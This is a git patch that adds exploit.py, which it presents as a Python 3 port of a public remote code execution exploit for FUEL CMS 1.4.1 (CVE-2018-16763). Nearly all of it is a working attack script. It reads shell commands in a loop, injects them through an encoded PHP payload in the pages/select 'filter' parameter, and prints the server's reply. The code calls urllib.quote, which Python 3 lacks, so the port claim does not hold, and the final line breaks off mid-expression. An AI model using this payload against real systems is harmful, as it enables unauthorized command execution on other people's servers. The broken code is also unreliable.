From 43da7331c617079358e24eef8d6fa7af858e474f Mon Sep 17 00:00:00 2001
From: "n3m1.sys"
Date: Sat, 10 Oct 2020 22:24:00 +0200
Subject: [PATCH] first commit
---
exploit.py | 28 ++++++++++++++++++++++++++++
1 file changed, 28 insertions(+)
create mode 100644 exploit.py
diff --git a/exploit.py b/exploit.py
new file mode 100644
index 0000000..d54610d
--- /dev/null
+++ b/exploit.py
@@ -0,0 +1,28 @@
+#!/bin/env python3
+#
+# fuelCMS 1.4.1 - Remote Code Execution
+#
+# Port Author: n3m1.sys
+# Original exploit by 0xd0ff9: https://www.exploit-db.com/exploits/47138
+#
+# This is a port to Python 3 of the original exploit, as Python 2 is now deprecated.
+#
+# Exploit Author: 0xd0ff9
+# Vendor Homepage: https://www.getfuelcms.com/
+# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
+# Version: <= 1.4.1
+# Tested on: Ubuntu - Apache2 - php5
+# CVE : CVE-2018-16763
+
+import requests
+import urllib
+
+url = "http://x.x.x.x:port" # Change this to the target URL
+
+while 1:
+ command = input("$: ")
+ exploit_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(command)+"%27%29%2b%27"
+ proxy = {"http" : "http://127.0.0.1:8080"} # List of the proxies you are behind
+ r = requests.get(exploit_url, proxies=proxy)
+
+ print(r.text[r.text.find("system")+6:r.text.find("